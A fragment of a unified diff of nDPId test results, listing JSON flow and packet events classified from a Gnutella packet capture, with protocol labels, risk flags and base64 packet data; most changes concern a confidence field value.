+00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":90746,"flow_last_seen":91439,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3759,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.32.126.214","src_port":50318,"dst_port":59596,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90741,"flow_last_seen":90864,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":865,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"46.128.114.107","src_port":50298,"dst_port":6578,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +01223{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":90746,"flow_last_seen":90948,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3245,"flow_avg_l4_payload_len":154,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.7.252.192","src_port":50314,"dst_port":6888,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Cert","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": 
{"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":84592,"flow_last_seen":85055,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":1144,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"210.209.249.84","src_port":50268,"dst_port":24751,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90741,"flow_last_seen":91415,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":903,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.200.255.229","src_port":50297,"dst_port":45710,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90747,"flow_last_seen":90850,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1111,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":50323,"dst_port":26253,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3367,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":219447,"flow_last_seen":219447,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":219447,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.187.171.240","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3367,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":369,"flow_packet_id":1,"flow_last_seen":219447,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":219447,"pkt":"UlQAEjUCCAAn5uVZCABFAABD+bUAAIARLzoKAAIPWbur8HAJGMoAL2mkIFAxArFAxy3\/Egk2kZ9VAwABABAAAADDA1NDUEECglZDRUdUS0di"} 
-00620{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":71216,"flow_last_seen":95489,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip4","src_ip":"10.0.2.2","dst_ip":"10.0.2.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":12827,"flow_last_seen":41755,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":966,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":40232,"flow_last_seen":40630,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.252","src_port":62539,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":40232,"flow_last_seen":40630,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.252","src_port":50435,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":40232,"flow_last_seen":40630,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1:3","src_port":62539,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90743,"flow_last_seen":96110,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1100,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"87.123.54.234","src_port":50301,"dst_port":54130,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 
{"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":40232,"flow_last_seen":40630,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1:3","src_port":50435,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":90745,"flow_last_seen":91669,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":628,"flow_tot_l4_payload_len":1729,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"149.28.163.175","src_port":50311,"dst_port":49956,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":90744,"flow_last_seen":98168,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"220.238.145.82","src_port":50306,"dst_port":33527,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00792{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":90743,"flow_last_seen":101917,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":597,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"75.64.6.175","src_port":50302,"dst_port":4743,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00663{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":40005,"flow_last_seen":43055,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":55708,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00620{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":71216,"flow_last_seen":95489,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip4","src_ip":"10.0.2.2","dst_ip":"10.0.2.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":12827,"flow_last_seen":41755,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":966,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
+00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":40232,"flow_last_seen":40630,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.252","src_port":62539,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":40232,"flow_last_seen":40630,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.252","src_port":50435,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":40232,"flow_last_seen":40630,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1:3","src_port":62539,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
+00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90743,"flow_last_seen":96110,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1100,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"87.123.54.234","src_port":50301,"dst_port":54130,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":40232,"flow_last_seen":40630,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1:3","src_port":50435,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
+00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":90745,"flow_last_seen":91669,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":628,"flow_tot_l4_payload_len":1729,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"149.28.163.175","src_port":50311,"dst_port":49956,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":90744,"flow_last_seen":98168,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"220.238.145.82","src_port":50306,"dst_port":33527,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00792{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":90743,"flow_last_seen":101917,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":597,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"75.64.6.175","src_port":50302,"dst_port":4743,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00663{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":40005,"flow_last_seen":43055,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":55708,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3451,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":229238,"flow_last_seen":229238,"flow_idle_time":200000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":229238,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"91.172.56.198","src_port":28681,"dst_port":11984,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3451,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":370,"flow_packet_id":1,"flow_last_seen":229238,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":119,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":119,"pkt_l4_len":85,"thread_ts_msec":229238,"pkt":"UlQAEjUCCAAn5uVZCABFAABpeXIAAIARIJEKAAIPW6w4xnAJLtAAVXM5R05EED9JAQFMQVEyUApVRFBdL+I1CXBBRaArSAlETnBpbmtmbG95ZEANSVVSTABQRlMARE4AQQAQTkFUAF0v4jUxAgBkGsTy6U4JcA8="} 00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3452,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":229238,"flow_last_seen":229238,"flow_idle_time":200000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":229238,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.131.202.24","src_port":28681,"dst_port":44748,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -1489,10 +1489,10 @@ 00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3454,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":373,"flow_packet_id":1,"flow_last_seen":229239,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":119,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":119,"pkt_l4_len":85,"thread_ts_msec":229239,"pkt":"UlQAEjUCCAAn5uVZCABFAABpd+QAAIARdQcKAAIPWHrpD3AJLOAAVT9CR05EED9MAQFMQVEyUApVRFBdL+I1CXDHjOZsSAlETnBpbmtmbG95ZEANSVVSTABQRlMARE4AQQAQTkFUAF0v4jUxAgBkGsTy6U4JcA8="} 00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3455,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":229240,"flow_last_seen":229240,"flow_idle_time":200000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":229240,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"62.35.190.5","src_port":28681,"dst_port":18604,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3455,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":374,"flow_packet_id":1,"flow_last_seen":229240,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":119,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":119,"pkt_l4_len":85,"thread_ts_msec":229240,"pkt":"UlQAEjUCCAAn5uVZCABFAABpQyQAAIAR7ygKAAIPPiO+BXAJSKwAVQDtR05EED9NAQFMQVEyUApVRFBdL+I1CXAx8WVwSAlETnBpbmtmbG95ZEANSVVSTABQRlMARE4AQQAQTkFUAF0v4jUxAgBkGsTy6U4JcA8="} 
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3481,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":40005,"flow_last_seen":43055,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":232090,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":55708,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3481,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":12529,"flow_last_seen":43193,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":348,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":232090,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} -00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3481,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":12529,"flow_last_seen":43193,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":348,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":232090,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} 
